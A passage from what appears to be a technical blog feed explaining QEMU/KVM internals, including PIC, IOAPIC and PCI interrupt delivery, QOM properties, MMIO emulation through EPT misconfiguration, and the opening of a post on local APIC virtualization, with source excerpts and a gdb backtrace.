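/* Demo handler standing in for gsi_handler: records the last raised line. */
static int last_raised = -1;
static void demo_gsi_handler(void *opaque, int n, int level)
{
    (void)opaque;
    if (level)
        last_raised = n;
}

static int demo(void)
{
    irq *gsi = allocate_irqs(demo_gsi_handler, NULL, 24);
    set_irq(&gsi[15], 1);   /* "raise GSI 15" */
    int r = last_raised;
    free(gsi);
    return r;
}
```

<p>Everything that follows in this post (PIC, IOAPIC, PCI routing) is just layers of such handlers chained together.</p>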
<p>Later, in ‘i440fx_init’, this ‘gsi’ is assigned to ‘piix3->pic’, it also calls ‘pci_bus_irqs’ to set the pci bus’s ‘set_irq’ and ‘get_irq’ function.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> pci_bus_irqs(b, piix3_set_irq, pci_slot_get_pirq, piix3,
PIIX_NUM_PIRQS);
</code></pre></div></div>
<p>The ‘piix3_set_irq’ function finally calls ‘piix3_set_irq_pic’, which as we can see raises or lowers ‘piix3->pic’, i.e. the ‘gsi’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void piix3_set_irq_pic(PIIX3State *piix3, int pic_irq)
{
    qemu_set_irq(piix3->pic[pic_irq],
                 !!(piix3->pic_levels &
                    (((1ULL << PIIX_NUM_PIRQS) - 1) <<
                     (pic_irq * PIIX_NUM_PIRQS))));
}
</code></pre></div></div>
</code></pre></div></div>
<p>Return to ‘pc_init1’, it calls ‘isa_bus_irqs’, this function set the ISA bus’s irqs to ‘gsi’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> isa_bus_irqs(isa_bus, pcms->gsi);
</code></pre></div></div>
<p>As we emulate the irqchip in QEMU, ‘i8259_init’ is called. It first calls ‘pc_allocate_cpu_irq’ to allocate a parent_irq, with ‘pic_irq_request’ as this irq’s handler.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>if (kvm_pic_in_kernel()) {
    i8259 = kvm_i8259_init(isa_bus);
} else if (xen_enabled()) {
    i8259 = xen_interrupt_controller_init();
} else {
    i8259 = i8259_init(isa_bus, pc_allocate_cpu_irq());
}

qemu_irq pc_allocate_cpu_irq(void)
{
    return qemu_allocate_irq(pic_irq_request, NULL, 0);
}
</code></pre></div></div>
</code></pre></div></div>
<p>In order to understand the function ‘i8259_init’, we first need to look at the i8259 realize function.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void pic_realize(DeviceState *dev, Error **errp)
{
    PICCommonState *s = PIC_COMMON(dev);
    PICClass *pc = PIC_GET_CLASS(dev);

    memory_region_init_io(&s->base_io, OBJECT(s), &pic_base_ioport_ops, s,
                          "pic", 2);
    memory_region_init_io(&s->elcr_io, OBJECT(s), &pic_elcr_ioport_ops, s,
                          "elcr", 1);

    qdev_init_gpio_out(dev, s->int_out, ARRAY_SIZE(s->int_out));
    qdev_init_gpio_in(dev, pic_set_irq, 8);

    pc->parent_realize(dev, errp);
}
</code></pre></div></div>
</code></pre></div></div>
<p>In the ‘pic_realize’ function, the most important functions are ‘qdev_init_gpio_out’ and ‘qdev_init_gpio_in’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void qdev_init_gpio_out(DeviceState *dev, qemu_irq *pins, int n)
{
    qdev_init_gpio_out_named(dev, pins, NULL, n);
}

void qdev_init_gpio_out_named(DeviceState *dev, qemu_irq *pins,
                              const char *name, int n)
{
    int i;
    NamedGPIOList *gpio_list = qdev_get_named_gpio_list(dev, name);

    assert(gpio_list->num_in == 0 || !name);

    if (!name) {
        name = "unnamed-gpio-out";
    }
    memset(pins, 0, sizeof(*pins) * n);
    for (i = 0; i < n; ++i) {
        gchar *propname = g_strdup_printf("%s[%u]", name,
                                          gpio_list->num_out + i);

        object_property_add_link(OBJECT(dev), propname, TYPE_IRQ,
                                 (Object **)&pins[i],
                                 object_property_allow_set_link,
                                 OBJ_PROP_LINK_UNREF_ON_RELEASE,
                                 &error_abort);
        g_free(propname);
    }
    gpio_list->num_out += n;
}
</code></pre></div></div>
</code></pre></div></div>
<p>The ‘qdev_init_gpio_out’ function adds a link property named ‘unnamed-gpio-out[0]’ and points the link at the address of ‘s->int_out’. Likewise, ‘qdev_init_gpio_in’ adds 8 ‘unnamed-gpio-in[n]’ input pins, backed by the ‘pic_set_irq’ handler.</p>
<p>Now return to the function ‘i8259_init’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>qemu_irq *i8259_init(ISABus *bus, qemu_irq parent_irq)
{
    qemu_irq *irq_set;
    DeviceState *dev;
    ISADevice *isadev;
    int i;

    irq_set = g_new0(qemu_irq, ISA_NUM_IRQS);

    isadev = i8259_init_chip(TYPE_I8259, bus, true);
    dev = DEVICE(isadev);
    qdev_connect_gpio_out(dev, 0, parent_irq);
    for (i = 0 ; i < 8; i++) {
        irq_set[i] = qdev_get_gpio_in(dev, i);
    }

    isa_pic = dev;

    isadev = i8259_init_chip(TYPE_I8259, bus, false);
    dev = DEVICE(isadev);
    qdev_connect_gpio_out(dev, 0, irq_set[2]);
    for (i = 0 ; i < 8; i++) {
        irq_set[i + 8] = qdev_get_gpio_in(dev, i);
    }

    slave_pic = PIC_COMMON(dev);
    return irq_set;
}
</code></pre></div></div>
</code></pre></div></div>
<p>It first creates the master PIC and connects its output pin (‘s->int_out’) to ‘parent_irq’; this is done through ‘qdev_connect_gpio_out’, which sets the ‘unnamed-gpio-out[0]’ link property. It then creates the slave PIC and connects its output pin to the master’s input pin 2 (irq_set[2], the cascade line). Finally it returns ‘irq_set’, which holds all of the PICs’ input ‘qemu_irq’s.</p>
<p>These ‘qemu_irq’s are then assigned to ‘gsi_state’, and ‘ioapic_init_gsi’ is called to initialize the IOAPIC.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void ioapic_init_gsi(GSIState *gsi_state, const char *parent_name)
{
    DeviceState *dev;
    SysBusDevice *d;
    unsigned int i;

    if (kvm_ioapic_in_kernel()) {
        dev = qdev_create(NULL, "kvm-ioapic");
    } else {
        dev = qdev_create(NULL, "ioapic");
    }
    if (parent_name) {
        object_property_add_child(object_resolve_path(parent_name, NULL),
                                  "ioapic", OBJECT(dev), NULL);
    }
    qdev_init_nofail(dev);
    d = SYS_BUS_DEVICE(dev);
    sysbus_mmio_map(d, 0, IO_APIC_DEFAULT_ADDRESS);

    for (i = 0; i < IOAPIC_NUM_PINS; i++) {
        gsi_state->ioapic_irq[i] = qdev_get_gpio_in(dev, i);
    }
}
</code></pre></div></div>
</code></pre></div></div>
<p>This creates the ioapic device and fills ‘gsi_state->ioapic_irq’ with the ioapic’s ‘qemu_irq’s. The latter are created in the realize function of the ioapic device; their handler is ‘ioapic_set_irq’.</p>
<h3> Interrupt delivery </h3>
<p>Let’s take a PCI device’s interrupt delivery as an example. A PCI device calls ‘pci_set_irq’ to raise an interrupt towards the guest.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void pci_set_irq(PCIDevice *pci_dev, int level)
{
    int intx = pci_intx(pci_dev);
    pci_irq_handler(pci_dev, intx, level);
}

static inline int pci_intx(PCIDevice *pci_dev)
{
    return pci_get_byte(pci_dev->config + PCI_INTERRUPT_PIN) - 1;
}

static void pci_irq_handler(void *opaque, int irq_num, int level)
{
    PCIDevice *pci_dev = opaque;
    int change;

    change = level - pci_irq_state(pci_dev, irq_num);
    if (!change)
        return;

    pci_set_irq_state(pci_dev, irq_num, level);
    pci_update_irq_status(pci_dev);
    if (pci_irq_disabled(pci_dev))
        return;
    pci_change_irq_level(pci_dev, irq_num, change);
}

static void pci_change_irq_level(PCIDevice *pci_dev, int irq_num, int change)
{
    PCIBus *bus;
    for (;;) {
        bus = pci_get_bus(pci_dev);
        irq_num = bus->map_irq(pci_dev, irq_num);
        if (bus->set_irq)
            break;
        pci_dev = bus->parent_dev;
    }
    bus->irq_count[irq_num] += change;
    bus->set_irq(bus->irq_opaque, irq_num, bus->irq_count[irq_num] != 0);
}
</code></pre></div></div>
</code></pre></div></div>
<p>There is a little PCI-specific knowledge here that I will not discuss; let’s focus on the interrupt instead.
In the last function, ‘pci_change_irq_level’, the PCI bus’s ‘map_irq’ is called to get the irq number, followed by ‘set_irq’, which as we know is ‘piix3_set_irq’. This function calls ‘piix3_set_irq_pic’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void piix3_set_irq_pic(PIIX3State *piix3, int pic_irq)
{
    qemu_set_irq(piix3->pic[pic_irq],
                 !!(piix3->pic_levels &
                    (((1ULL << PIIX_NUM_PIRQS) - 1) <<
                     (pic_irq * PIIX_NUM_PIRQS))));
}
</code></pre></div></div>
</code></pre></div></div>
<p>‘piix3->pic’ is the gsi array, and the handler is ‘gsi_handler’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void gsi_handler(void *opaque, int n, int level)
{
    GSIState *s = opaque;

    DPRINTF("pc: %s GSI %d\n", level ? "raising" : "lowering", n);
    if (n < ISA_NUM_IRQS) {
        qemu_set_irq(s->i8259_irq[n], level);
    }
    qemu_set_irq(s->ioapic_irq[n], level);
}
</code></pre></div></div>
</code></pre></div></div>
<p>It chooses the interrupt controller according to the irq number and calls the corresponding handler. Taking ioapic_irq as an example, the handler is ‘ioapic_set_irq’. This function calls ‘ioapic_service’ to deliver the interrupt to the LAPIC through ‘stl_le_phys’, which triggers the APIC’s MMIO write function, ‘apic_mem_writel’. The APIC then calls ‘apic_update_irq’ to process the interrupt, then ‘cpu_interrupt’, and finally ‘kvm_handle_interrupt’ is called.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void kvm_handle_interrupt(CPUState *cpu, int mask)
{
    cpu->interrupt_request |= mask;

    if (!qemu_cpu_is_self(cpu)) {
        qemu_cpu_kick(cpu);
    }
}
</code></pre></div></div>
<p>This sets ‘cpu->interrupt_request’; on the next entry into the guest, QEMU issues the ‘KVM_INTERRUPT’ ioctl to inject the interrupt into the guest.</p>
<p>Let’s look at a backtrace of interrupt delivery to get a deeper impression.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(gdb) bt
#0 apic_mem_write (opaque=0x61600000a280, addr=16388, val=33, size=4)
at /home/test/qemu/hw/intc/apic.c:756
#1 0x000055ce1f7241fd in memory_region_write_accessor (mr=0x61600000a300,
addr=16388, value=0x7f329b8f8188, size=4, shift=0, mask=4294967295,
attrs=...) at /home/test/qemu/memory.c:526
#2 0x000055ce1f7244d6 in access_with_adjusted_size (addr=16388,
value=0x7f329b8f8188, size=4, access_size_min=1, access_size_max=4,
access_fn=0x55ce1f72404f <memory_region_write_accessor>,
mr=0x61600000a300, attrs=...) at /home/test/qemu/memory.c:593
#3 0x000055ce1f72b2cc in memory_region_dispatch_write (mr=0x61600000a300,
addr=16388, data=33, size=4, attrs=...) at /home/test/qemu/memory.c:1473
#4 0x000055ce1f65021b in address_space_stl_internal (
as=0x55ce2142c940 <address_space_memory>, addr=4276109316, val=33,
attrs=..., result=0x0, endian=DEVICE_LITTLE_ENDIAN)
at /home/test/qemu/memory_ldst.inc.c:349
#5 0x000055ce1f65047f in address_space_stl_le (
as=0x55ce2142c940 <address_space_memory>, addr=4276109316, val=33,
attrs=..., result=0x0) at /home/test/qemu/memory_ldst.inc.c:386
#6 0x000055ce1f80aff5 in stl_le_phys (
as=0x55ce2142c940 <address_space_memory>, addr=4276109316, val=33)
at /home/test/qemu/include/exec/memory_ldst_phys.inc.h:103
#7 0x000055ce1f80c8af in ioapic_service (s=0x61b000002a80)
at /home/test/qemu/hw/intc/ioapic.c:136
#8 0x000055ce1f80cb35 in ioapic_set_irq (opaque=0x61b000002a80, vector=15,
level=1) at /home/test/qemu/hw/intc/ioapic.c:175
#9 0x000055ce1fbe79a0 in qemu_set_irq (irq=0x60600006a880, level=1)
at hw/core/irq.c:45
#10 0x000055ce1f8bfb1c in gsi_handler (opaque=0x612000007540, n=15, level=1)
at /home/test/qemu/hw/i386/pc.c:120
#11 0x000055ce1fbe79a0 in qemu_set_irq (irq=0x6060000414e0, level=1)
at hw/core/irq.c:45
#12 0x000055ce1fc8a0f3 in bmdma_irq (opaque=0x6250001c3e10, n=0, level=1)
at hw/ide/pci.c:222
#13 0x000055ce1fbe79a0 in qemu_set_irq (irq=0x606000091280, level=1)
at hw/core/irq.c:45
#14 0x000055ce1fc7ba3c in qemu_irq_raise (irq=0x606000091280)
at /home/test/qemu/include/hw/irq.h:16
#15 0x000055ce1fc7bb20 in ide_set_irq (bus=0x6250001c32c0)
at /home/test/qemu/include/hw/ide/internal.h:568
#16 0x000055ce1fc7fa75 in ide_atapi_cmd_reply_end (s=0x6250001c3338)
at hw/ide/atapi.c:319
#17 0x000055ce1fc7902c in ide_data_readl (opaque=0x6250001c32c0, addr=368)
at hw/ide/core.c:2389
#18 0x000055ce1f713e32 in portio_read (opaque=0x614000002040, addr=0, size=4)
at /home/test/qemu/ioport.c:180
#19 0x000055ce1f7239bb in memory_region_read_accessor (mr=0x614000002040,
addr=0, value=0x7f329b8f8790, size=4, shift=0, mask=4294967295, attrs=...)
at /home/test/qemu/memory.c:435
#20 0x000055ce1f7244d6 in access_with_adjusted_size (addr=0,
value=0x7f329b8f8790, size=4, access_size_min=1, access_size_max=4,
access_fn=0x55ce1f723913 <memory_region_read_accessor>, mr=0x614000002040,
attrs=...) at /home/test/qemu/memory.c:593
#21 0x000055ce1f72aa42 in memory_region_dispatch_read1 (mr=0x614000002040,
addr=0, pval=0x7f329b8f8790, size=4, attrs=...)
at /home/test/qemu/memory.c:1392
#22 0x000055ce1f72ac25 in memory_region_dispatch_read (mr=0x614000002040,
addr=0, pval=0x7f329b8f8790, size=4, attrs=...)
at /home/test/qemu/memory.c:1423
#23 0x000055ce1f64cd0c in flatview_read_continue (fv=0x60600017f120, addr=368,
attrs=..., buf=0x7f329e50c004 "", len=4, addr1=0, l=4, mr=0x614000002040)
at /home/test/qemu/exec.c:3293
#24 0x000055ce1f64d028 in flatview_read (fv=0x60600017f120, addr=368,
attrs=..., buf=0x7f329e50c004 "", len=4) at /home/test/qemu/exec.c:3331
#25 0x000055ce1f64d0ed in address_space_read_full (
as=0x55ce2142c8c0 <address_space_io>, addr=368, attrs=...,
buf=0x7f329e50c004 "", len=4) at /home/test/qemu/exec.c:3344
#26 0x000055ce1f64d1c4 in address_space_rw (
as=0x55ce2142c8c0 <address_space_io>, addr=368, attrs=...,
buf=0x7f329e50c004 "", len=4, is_write=false)
at /home/test/qemu/exec.c:3374
#27 0x000055ce1f770021 in kvm_handle_io (port=368, attrs=...,
data=0x7f329e50c000, direction=0, size=4, count=2)
at /home/test/qemu/accel/kvm/kvm-all.c:1731
#28 0x000055ce1f7712f9 in kvm_cpu_exec (cpu=0x631000028800)
at /home/test/qemu/accel/kvm/kvm-all.c:1971
#29 0x000055ce1f6e5650 in qemu_kvm_cpu_thread_fn (arg=0x631000028800)
at /home/test/qemu/cpus.c:1257
#30 0x000055ce20354746 in qemu_thread_start (args=0x603000024a60)
at util/qemu-thread-posix.c:504
#31 0x00007f32a175b6db in start_thread (arg=0x7f329b8f9700)
at pthread_create.c:463
#32 0x00007f32a148488f in clone ()
</code></pre></div></div>
QOM Property (2018-09-05): http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2018/09/05/qom-property
<p>A long time ago I discussed class-based polymorphism in QOM, but I left out one important aspect: properties, which implement a kind of prototype-based polymorphism. Properties are the interface QOM exports to the outside world; devices can set/get properties statically or dynamically. In this post I will discuss how properties are stored in QOM and how they interact with other parts of QEMU.</p>
<h3> Data structure </h3>
<p>Both struct ‘ObjectClass’ and struct ‘Object’ have a GHashTable ‘properties’ field; the former holds the common class properties and the latter the object’s own properties.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct ObjectClass
{
    /*< private >*/
    Type type;
    GSList *interfaces;

    const char *object_cast_cache[OBJECT_CLASS_CAST_CACHE];
    const char *class_cast_cache[OBJECT_CLASS_CAST_CACHE];

    ObjectUnparent *unparent;

    GHashTable *properties;
};

struct Object
{
    /*< private >*/
    ObjectClass *class;
    ObjectFree *free;
    GHashTable *properties;
    uint32_t ref;
    Object *parent;
};
</code></pre></div></div>
</code></pre></div></div>
<p>A property is represented by struct ‘ObjectProperty’, which contains the basic information plus getter and setter function pointers.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>typedef struct ObjectProperty
{
    gchar *name;
    gchar *type;
    gchar *description;
    ObjectPropertyAccessor *get;
    ObjectPropertyAccessor *set;
    ObjectPropertyResolve *resolve;
    ObjectPropertyRelease *release;
    void *opaque;
} ObjectProperty;
</code></pre></div></div>
</code></pre></div></div>
<p>An ‘ObjectProperty’ is inserted into the ‘properties’ hashtable of either struct ‘ObjectClass’ or struct ‘Object’.</p>
<p>For every kind of property there is a concrete struct describing it. For example:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/* link property */
typedef struct {
    Object **child;
    void (*check)(const Object *, const char *, Object *, Error **);
    ObjectPropertyLinkFlags flags;
} LinkProperty;

/* string property */
typedef struct StringProperty
{
    char *(*get)(Object *, Error **);
    void (*set)(Object *, const char *, Error **);
} StringProperty;

/* bool property */
typedef struct BoolProperty
{
    bool (*get)(Object *, Error **);
    void (*set)(Object *, bool, Error **);
} BoolProperty;
</code></pre></div></div>
</code></pre></div></div>
<p>The concrete property is stored in the ‘ObjectProperty’s ‘opaque’ field.
The following picture shows the relation of these structures.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Object
+-----------+
| |
| |
+-----------+
| properties+----------+---------------------------------------------------->
+-----------+ ^
| | |
| | |
+-----------+ +---+----+
| name |
+--------+
| type |
+--------+
| set +-> property_set_bool
+--------+
| get +-> property_get_bool
+--------+
| opaque +----+ +---------+
+--------+ | get +--> memfd_backend_get_seal
ObjectProperty +---------+
| set +--> memfd_backend_set_seal
+---------+
BoolProperty
</code></pre></div></div>
<h3> Interface </h3>
<p>‘object_property_add’ is used to add a property to Object.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ObjectProperty *
object_property_add(Object *obj, const char *name, const char *type,
ObjectPropertyAccessor *get,
ObjectPropertyAccessor *set,
ObjectPropertyRelease *release,
void *opaque, Error **errp)
{
ObjectProperty *prop;
size_t name_len = strlen(name);
if (name_len >= 3 && !memcmp(name + name_len - 3, "[*]", 4)) {
int i;
ObjectProperty *ret;
char *name_no_array = g_strdup(name);
name_no_array[name_len - 3] = '\0';
for (i = 0; ; ++i) {
char *full_name = g_strdup_printf("%s[%d]", name_no_array, i);
ret = object_property_add(obj, full_name, type, get, set,
release, opaque, NULL);
g_free(full_name);
if (ret) {
break;
}
}
g_free(name_no_array);
return ret;
}
if (object_property_find(obj, name, NULL) != NULL) {
error_setg(errp, "attempt to add duplicate property '%s'"
" to object (type '%s')", name,
object_get_typename(obj));
return NULL;
}
prop = g_malloc0(sizeof(*prop));
prop->name = g_strdup(name);
prop->type = g_strdup(type);
prop->get = get;
prop->set = set;
prop->release = release;
prop->opaque = opaque;
g_hash_table_insert(obj->properties, prop->name, prop);
return prop;
}
</code></pre></div></div>
<p>It first checks whether a property with this name already exists; if not, it allocates a new ObjectProperty and inserts it into the hashtable. The [*] case is not discussed here.</p>
<p>‘object_property_find’ is used to find whether the Object has a given property; this function also searches the properties of the object’s class and its parent classes.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ObjectProperty *object_property_find(Object *obj, const char *name,
Error **errp)
{
ObjectProperty *prop;
ObjectClass *klass = object_get_class(obj);
prop = object_class_property_find(klass, name, NULL);
if (prop) {
return prop;
}
prop = g_hash_table_lookup(obj->properties, name);
if (prop) {
return prop;
}
error_setg(errp, "Property '.%s' not found", name);
return NULL;
}
</code></pre></div></div>
<h3> Example </h3>
<p>Let’s take ‘TYPE_DEVICE’ as an example.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static const TypeInfo device_type_info = {
.name = TYPE_DEVICE,
.parent = TYPE_OBJECT,
.instance_size = sizeof(DeviceState),
.instance_init = device_initfn,
.instance_post_init = device_post_init,
.instance_finalize = device_finalize,
.class_base_init = device_class_base_init,
.class_init = device_class_init,
.abstract = true,
.class_size = sizeof(DeviceClass),
};
</code></pre></div></div>
<p>The instance init function is ‘device_initfn’. In this function some properties such as ‘realized’ and ‘hotpluggable’ are added.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void device_initfn(Object *obj)
{
DeviceState *dev = DEVICE(obj);
ObjectClass *class;
Property *prop;
if (qdev_hotplug) {
dev->hotplugged = 1;
qdev_hot_added = true;
}
dev->instance_id_alias = -1;
dev->realized = false;
object_property_add_bool(obj, "realized",
device_get_realized, device_set_realized, NULL);
object_property_add_bool(obj, "hotpluggable",
device_get_hotpluggable, NULL, NULL);
object_property_add_bool(obj, "hotplugged",
device_get_hotplugged, NULL,
&error_abort);
class = object_get_class(OBJECT(dev));
do {
for (prop = DEVICE_CLASS(class)->props; prop && prop->name; prop++) {
qdev_property_add_legacy(dev, prop, &error_abort);
qdev_property_add_static(dev, prop, &error_abort);
}
class = object_class_get_parent(class);
} while (class != object_class_by_name(TYPE_DEVICE));
object_property_add_link(OBJECT(dev), "parent_bus", TYPE_BUS,
(Object **)&dev->parent_bus, NULL, 0,
&error_abort);
QLIST_INIT(&dev->gpios);
}
</code></pre></div></div>
<p>The setter of ‘realized’ property function is ‘device_set_realized’.</p>
<p>For each device option on the qemu command line, the main function calls ‘device_init_func’, which calls ‘qdev_device_add’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int device_init_func(void *opaque, QemuOpts *opts, Error **errp)
{
Error *err = NULL;
DeviceState *dev;
dev = qdev_device_add(opts, &err);
if (!dev) {
error_report_err(err);
return -1;
}
object_unref(OBJECT(dev));
return 0;
}
</code></pre></div></div>
<p>In ‘qdev_device_add’ it calls ‘object_property_set_bool’ to set the ‘realized’ property to true.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> object_property_set_bool(OBJECT(dev), true, "realized", &err);
</code></pre></div></div>
<p>‘object_property_set_bool’ calls ‘object_property_set’, which first invokes the ObjectProperty’s set function (‘property_set_bool’); ‘property_set_bool’ then invokes the BoolProperty’s set function, which is ‘device_set_realized’. Finally, ‘device_set_realized’ calls the DeviceClass’s realize function and the device is initialized.</p>
KVM MMIO implementation2018-09-03T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2018/09/03/kvm-mmio
<p>As we already know, we can access devices through PIO and MMIO to drive them. For PIO, we can configure the VMCS to intercept the specified ports. But how is MMIO emulation implemented? This blog discusses that.</p>
<p>In summary, MMIO emulation works as follows:</p>
<ol>
<li>QEMU declares a memory region (but does not allocate RAM for it or commit it to kvm)</li>
<li>The guest first accesses the MMIO address, causing an EPT-violation VM-exit</li>
<li>KVM constructs the EPT page table and marks the page-table entry with a special mark (110b)</li>
<li>When the guest later accesses this MMIO address, it is handled by the EPT-misconfig VM-exit handler</li>
</ol>
<h3> QEMU part </h3>
<p>QEMU uses the function ‘memory_region_init_io’ to declare an MMIO region. Here we can see that ‘mr->ram’ stays false (compare with ‘memory_region_init_ram’ below), so no real memory is allocated.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void memory_region_init_io(MemoryRegion *mr,
Object *owner,
const MemoryRegionOps *ops,
void *opaque,
const char *name,
uint64_t size)
{
memory_region_init(mr, owner, name, size);
mr->ops = ops ? ops : &unassigned_mem_ops;
mr->opaque = opaque;
mr->terminates = true;
}
void memory_region_init_ram(MemoryRegion *mr,
Object *owner,
const char *name,
uint64_t size,
Error **errp)
{
memory_region_init(mr, owner, name, size);
mr->ram = true;
mr->terminates = true;
mr->destructor = memory_region_destructor_ram;
mr->ram_block = qemu_ram_alloc(size, mr, errp);
mr->dirty_log_mask = tcg_enabled() ? (1 << DIRTY_MEMORY_CODE) : 0;
}
</code></pre></div></div>
<p>When this region is committed to kvm, ‘kvm_region_add’ is called, which in turn calls ‘kvm_set_phys_mem’. If the region is not RAM, the function just returns and no memslot is created/updated in kvm.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void kvm_set_phys_mem(KVMMemoryListener *kml,
MemoryRegionSection *section, bool add)
{
KVMState *s = kvm_state;
KVMSlot *mem, old;
int err;
MemoryRegion *mr = section->mr;
bool writeable = !mr->readonly && !mr->rom_device;
if (!memory_region_is_ram(mr)) {
if (writeable || !kvm_readonly_mem_allowed) {
return;
} else if (!mr->romd_mode) {
/* If the memory device is not in romd_mode, then we actually want
* to remove the kvm memory slot so all accesses will trap. */
add = false;
}
}
}
</code></pre></div></div>
<h3> KVM part </h3>
<p>In ‘vmx_init’, when ept enabled, it calls ‘ept_set_mmio_spte_mask’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void ept_set_mmio_spte_mask(void)
{
/*
* EPT Misconfigurations can be generated if the value of bits 2:0
* of an EPT paging-structure entry is 110b (write/execute).
* Also, magic bits (0x3ull << 62) is set to quickly identify mmio
* spte.
*/
kvm_mmu_set_mmio_spte_mask((0x3ull << 62) | 0x6ull);
}
void kvm_mmu_set_mmio_spte_mask(u64 mmio_mask)
{
shadow_mmio_mask = mmio_mask;
}
</code></pre></div></div>
<p>Here set ‘shadow_mmio_mask’.</p>
<p>When the guest accesses the MMIO address, the VM exits due to an EPT violation and ‘tdp_page_fault’ is called. ‘__direct_map’ is then called to construct the EPT page table.</p>
<p>After the long call-chain, the final function ‘mark_mmio_spte’ will be called to set the spte with ‘shadow_mmio_mask’ which as we already know is set when the vmx initialization.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>__direct_map
-->mmu_set_spte
-->set_spte
-->set_mmio_spte
-->mark_mmio_spte
</code></pre></div></div>
<p>The condition to call ‘mark_mmio_spte’ is ‘is_noslot_pfn’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static bool set_mmio_spte(struct kvm *kvm, u64 *sptep, gfn_t gfn,
pfn_t pfn, unsigned access)
{
if (unlikely(is_noslot_pfn(pfn))) {
mark_mmio_spte(kvm, sptep, gfn, access);
return true;
}
return false;
}
static inline bool is_noslot_pfn(pfn_t pfn)
{
return pfn == KVM_PFN_NOSLOT;
}
</code></pre></div></div>
<p>As we know, QEMU does not commit the MMIO memory region, so the pfn is ‘KVM_PFN_NOSLOT’ and the spte is marked with ‘shadow_mmio_mask’.</p>
<p>When the guest later accesses this MMIO page, since its EPT page-table entry is 110b, the access causes a VM exit with the EPT-misconfig reason (after all, how can a page be writable/executable but not readable?). The handler ‘handle_ept_misconfig’ first processes the MMIO case, which is dispatched to the QEMU part.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int handle_ept_misconfig(struct kvm_vcpu *vcpu)
{
u64 sptes[4];
int nr_sptes, i, ret;
gpa_t gpa;
gpa = vmcs_read64(GUEST_PHYSICAL_ADDRESS);
ret = handle_mmio_page_fault_common(vcpu, gpa, true);
if (likely(ret == RET_MMIO_PF_EMULATE))
return x86_emulate_instruction(vcpu, gpa, 0, NULL, 0) ==
EMULATE_DONE;
if (unlikely(ret == RET_MMIO_PF_INVALID))
return kvm_mmu_page_fault(vcpu, gpa, 0, NULL, 0);
if (unlikely(ret == RET_MMIO_PF_RETRY))
return 1;
/* It is the real ept misconfig */
printk(KERN_ERR "EPT: Misconfiguration.\n");
printk(KERN_ERR "EPT: GPA: 0x%llx\n", gpa);
nr_sptes = kvm_mmu_get_spte_hierarchy(vcpu, gpa, sptes);
for (i = PT64_ROOT_LEVEL; i > PT64_ROOT_LEVEL - nr_sptes; --i)
ept_misconfig_inspect_spte(vcpu, sptes[i-1], i);
vcpu->run->exit_reason = KVM_EXIT_UNKNOWN;
vcpu->run->hw.hardware_exit_reason = EXIT_REASON_EPT_MISCONFIG;
return 0;
}
</code></pre></div></div>
Local APIC virtualization2018-08-29T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2018/08/29/apicv
<h3> Background </h3>
<p>In the last article I wrote about software interrupt virtualization: the implementation of pic/ioapic/apic emulation in kvm. We know that with software emulation every guest interrupt needs a VM-exit, which is a very significant overhead in virtualization. Not surprisingly, Intel has a solution for this issue, called APIC virtualization.</p>
<p>Before we go to APIC virtualization, we first need to know something about the local APIC. The local APIC and IO APIC handle interrupt delivery in multiprocessor systems. The following picture shows the relation between the IO APIC and the local APICs.</p>
<p><img src="/assets/img/apicv/1.png" alt="" /></p>
<p>In a word, every CPU has an accompanying local APIC (LAPIC) and the IOAPIC is used to dispatch interrupt to the LAPIC.</p>
<h3> LAPIC base address </h3>
<p>Software interacts with the local APIC by reading and writing its registers. APIC registers are memory-mapped to a 4-KByte region of the processor’s physical address space with an initial starting address of FEE00000H. For correct APIC operation, this address space must be mapped to an area of memory that has been designated as strong uncacheable (UC).</p>
<p>Notice that FEE00000H lies in the physical address space, not in physical memory. What is the difference? The physical address space is seen from the CPU’s perspective: when the CPU reads/writes the APIC registers, the access is handled by the APIC, as if intercepted, and never reaches memory. Although there is one LAPIC per CPU core and they all map to the same address, each CPU accessing this address just reaches its own LAPIC, so there is no conflict.</p>
<h3> APIC virtualization </h3>
